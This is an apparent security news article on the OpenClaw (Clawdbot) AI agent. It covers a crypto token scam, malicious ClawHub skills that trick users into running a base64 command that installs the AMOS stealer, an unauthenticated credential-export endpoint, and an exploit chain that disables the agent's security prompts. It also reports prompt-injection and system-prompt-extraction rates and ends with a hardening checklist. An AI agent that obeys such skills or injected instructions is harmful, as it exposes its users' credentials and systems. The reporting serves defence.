OpenClaw (Clawdbot) Created the First Victims of AI Agents

$16 Million Evaporated in 10 Seconds

On January 27, 2026, an Austrian developer released a Twitter handle. Ten seconds later, a professional scammer snatched it. Within hours, a fake token listed under that handle hit a $16 million market cap. Hours after that, it crashed over 90%.

The developer was Peter Steinberger. His open-source project Clawdbot hit 60,000 GitHub stars within three days of launching in November 2025. It passed 100,000 in a week. By late January 2026, it surpassed 160,000 stars and attracted 2 million visitors in a single week. It was an AI agent that could take over your computer — managing email, calendar, messaging apps, executing shell commands, reading and writing your file system.

Anthropic decided "Clawd" sounded too much like "Claude" and demanded a name change. Steinberger renamed it to Moltbot, then three days later to OpenClaw. Between those two renames, he needed to release the old @clawdbot handle to register new ones.

In that ten-second window, everything collapsed.

The snatcher got a handle with real followers, real post history, and a real avatar. They posted an "official Clawdbot governance token" called $CLAWD. Because the account looked 100% legitimate, thousands of users assumed it was real. FOMO plus Solana liquidity manipulation sent $CLAWD's market cap soaring.

Steinberger posted: "I will never do a coin. Any project that lists me as coin owner is a SCAM."

Too late. Following the typical Solana meme coin rug pull pattern, the operators cashed out 10-30% of the market cap before the crash. Ten percent of $16 million is $1.6 million. Time spent: under 24 hours.

Meanwhile, Twitter was flooded with "everyone's making money with Clawdbot" posts. One account described making "six-figure profits" on Polymarket with Clawdbot. Another claimed "Free ClawdBot is printing money on Polymarket... made about $460K." These posts weren't sharing experiences. They were manufacturing FOMO for the $CLAWD token.

---

The First Victims Didn't Get Hacked — They Voluntarily Handed Over the Keys

The $CLAWD token victims were a classic crypto fraud story. The second wave of victims is more interesting because they were technical users who thought they were making rational decisions.

OpenClaw has a skill marketplace called ClawHub, where users install extensions for their AI agent. The barrier to entry for publishing skills is remarkably low: a GitHub account older than one week, no code review process.

Security researchers discovered an attack campaign codenamed ClawHavoc. Koi Security audited 2,857 skills and found 341 malicious ones — a 12% infection rate. Another firm, SlowMist, reported 472 affected skills sharing the same attack infrastructure.

At least 14 individuals were identified as contributing malicious content, though some may have been compromised legitimate accounts. The most prolific, hightower6eu, uploaded 354 malicious packages focused on crypto analytics. Another actor, Sakaen736jih, was observed submitting new malicious skills every few minutes in early February using an automated deployment script. An established account, davidsmorais, uploaded a mix of legitimate and malicious skills — consistent with an account takeover.

Over 100 malicious skills masqueraded as crypto tools: Solana wallet trackers, Phantom wallet utilities, Ethereum gas monitors, Bitcoin blockchain analyzers, insider wallet finders. Another batch disguised as Polymarket prediction bots, precisely targeting the Clawdbot user base's interests.

The attack didn't execute malicious code directly. Instead, skills displayed a simulated error or "environment verification" prompt, instructing users to execute a base64-encoded terminal command to "fix" the issue. This command connected to attacker infrastructure at 91.92.242[.]30 and downloaded a second-stage dropper script. Security researchers call this technique ClickFix. Users thought they were fixing their environment. They were installing a backdoor.

The payload was Atomic macOS Stealer (AMOS), a 521KB universal Mach-O binary (x86_64 + arm64). It's sold on dark web Telegram channels for $500-1,000/month. AMOS uses runtime string decryption to evade static analysis, clears the quarantine attribute to bypass macOS Gatekeeper, and employs ptrace() and sysctl() to detect and evade debuggers.

Exfiltrated data was uploaded to socifiapp[.]com/api/reports/upload. The ClawHavoc campaign reached over 120 countries.

---

An Endpoint You've Probably Never Heard Of: /api/export-auth

Most coverage focused on CVE-2026-25253 and ClawHavoc. But there's an equally lethal issue that received almost no attention.

OpenClaw has an endpoint designed for backing up user credentials: /api/export-auth. The problem: it has no authentication or authorization checks whatsoever.

Anyone who can reach this endpoint — whether through an exposed gateway or via the CVE-2026-25253 one-click exploit — can extract all API tokens stored in your OpenClaw instance. OpenAI, Claude, Google AI. Plaintext. No encryption.

Hunt.io published a report on February 3: "Hunting OpenClaw Exposures: CVE-2026-25253 in Internet-Facing AI Agent Gateways." They identified over 17,500 exposed OpenClaw instances across 52 countries, 98.6% running on cloud infrastructure. By late January, that number grew past 21,000. By February 8, The Hacker News reported it had exceeded 30,000.

The CVE-2026-25253 kill chain is more sophisticated than most reports describe. Attackers don't just steal the auth token — they use Cross-Site WebSocket Hijacking to connect to the victim's OpenClaw instance, disable security prompts, and execute arbitrary shell commands on the host system. It's a complete kill chain from "click a link" to "full computer control."

Security engineer Lucas Valbuena's ZeroLeaks assessment became one of the most shared security tweets of the year. Overall score: 2/100. System prompt extraction rate: 84%. Prompt injection success rate: 91%.

Snyk found that 283 out of 3,984 ClawHub skills (7.1%) had design flaws that instructed the AI agent to write API keys, passwords, and credit card numbers in plaintext to output logs. These weren't malicious skills — just poorly written ones. The effect was the same.

---

This Isn't a Problem You Can Patch

Daniel Miessler is known in the security community as an AI optimist — a "98% AI YOLO Maximalist." But on January 27, he posted: "I'm asking you to please listen to this. Here are some of the top security issues with clawd.bot that you all should be avoiding."

OpenClaw's security problems aren't the kind you fix by updating to the latest version. They represent a structural contradiction baked into the AI agent product category.

A useful AI agent needs access to your email, calendar, file system, and messaging apps. It needs to execute code, call APIs, and interact with web pages. Its value comes from having maximum permissions. Restricting permissions means restricting functionality.

Traditional software security is built on determinism — you audit the code, you know what it does. AI agents are non-deterministic. The same input can produce different outputs. You can't protect unpredictable software with traditional whitelists and firewalls.

CrowdStrike and Trend Micro released "Agentic AI Security Framework" reports in early 2026. Their conclusion: traditional security tools cannot protect non-deterministic AI agents. What's needed is an entirely new governance paradigm.

---

"Shadow AI" and the Numbers Keeping CISOs Awake

The $CLAWD scam hurt retail speculators. ClawHavoc hurt technical users. But enterprises may suffer the largest losses.

CISO survey data from 2026 reveals a disturbing reality: 71% of AI tools already have access to core business systems, but only 16% of organizations govern this access effectively. 92% of organizations lack full visibility into AI identity activity. 95% doubt their ability to detect AI misuse.

75% of CISOs have discovered unauthorized AI tools in their environments — tools with embedded credentials or elevated system access that aren't being monitored. CISOs now rank "shadow AI" as their number one security risk.

Why do employees do this? 60% of surveyed employees admitted they'd take security risks by using unauthorized AI tools to get work done faster. OpenClaw is exactly the kind of tool that's irresistible to install and try.

Then things get very bad. An employee installs OpenClaw on a work computer, grants it access to company email, code repositories, and internal docs. The gateway port is left open, authentication isn't configured, or a ClawHub skill with an AMOS backdoor gets installed. The company's source code, customer data, and internal communications get packaged and exfiltrated.

There's a cascading consequence most people don't know about: by Q3 2026, cyber insurance policies are expected to explicitly exclude AI agent-related breaches unless specific controls are demonstrated. 97% of organizations reporting AI-related incidents lacked proper access controls. In other words, if your company suffers a data breach because an employee deployed OpenClaw without authorization, insurance may not cover it.

---

If You Must Use It, Here's the Configuration That Can Save You

Steinberger partnered with Google VirusTotal to scan ClawHub skills, established vulnerability reporting, and hired the researcher who found the critical flaws. But the following configuration is on you. This isn't advice. It's a survival baseline.

Update immediately to v2026.1.29 or later. CVE-2026-25253 is patched in this version. Any earlier version is exploitable with a single click right now.

Then rotate every credential. If you used a vulnerable version and visited any untrusted website, assume all your API tokens are compromised. OpenAI, Claude, Google AI — rotate everything.

Deploy to an isolated environment. Don't run OpenClaw on your primary machine. Use a dedicated device, VPS, or virtual machine. DigitalOcean offers a hardened one-click deploy. If using Docker, add: --read-only (prevent filesystem writes), --security-opt=no-new-privileges (prevent privilege escalation), --cap-drop=ALL (remove all Linux capabilities).

Lock down the network. Never expose OpenClaw's ports (default 18789) to the public internet. Use Tailscale for private encrypted tunnels. If public access is unavoidable, place behind NGINX with strong auth and rate limiting. Verify gateway config auth is not none. Restrict outbound traffic to only necessary API endpoints (OpenAI, Anthropic) — block all other internet access to prevent exfiltration.

Set sandbox mode to maximum. OpenClaw's sandbox.mode controls which sessions run sandboxed. Set to non-main (sandboxes group chats and external channels) or all (sandboxes everything, safest but adds latency). Restrict high-risk tools exec, browser, web_fetch, web_search to trusted agents only.

Broker credentials, don't expose them. Don't let OpenClaw handle API tokens directly. Use OAuth brokering solutions (like Composio) to isolate sensitive credentials. Configure short-lived session tokens instead of permanent ones. OpenClaw has been found to store credentials in plaintext in local config files.

Lock down chat integrations. Never let your OpenClaw bot join public channels where strangers can send it messages. Restrict command acceptance to specific user IDs. Enable MFA on all integrated accounts.

Enable audit logging. Monitor every action OpenClaw executes. Watch for unexpected config changes and command execution. Treat all links, attachments, and pasted instructions from untrusted sources as hostile by default.

---

160K Stars ≠ Security

160,000 GitHub stars. 2 million weekly visitors. OpenClaw was one of the fastest-growing open-source projects of 2025.

But star count measures popularity, not security. High popularity made OpenClaw a more attractive attack target. Scammers chose it for the fake token, malware authors chose ClawHub as a distribution channel — all because the user base was large enough.

OpenClaw reveals a fundamental dilemma in the AI agent category. User value comes from maximizing permissions. Security risk also comes from maximizing permissions. There's no space for compromise.

You can't tell an AI agent "manage my email but don't read my email." You can't say "execute code but not malicious code." It can't tell the difference. It's non-deterministic. The same instruction in different contexts can produce entirely different behavior.

The configuration checklist above can't solve the fundamental contradiction. But it can move you from "near-certain to be attacked" to "at least not the easiest target." In an ecosystem where 30,000 instances are exposed to the public internet, that's already a significant advantage.

---

Sources: Forbes, The Hacker News, BleepingComputer, SecurityWeek, Snyk, CrowdStrike, Trend Micro, Bitdefender, ZeroLeaks, DepthFirst, Hunt.io, Cisco, Koi Security, SlowMist, Composio, NIST CVE Database

Disclaimer: This article does not constitute investment advice. All cryptocurrency tokens mentioned are confirmed scam projects.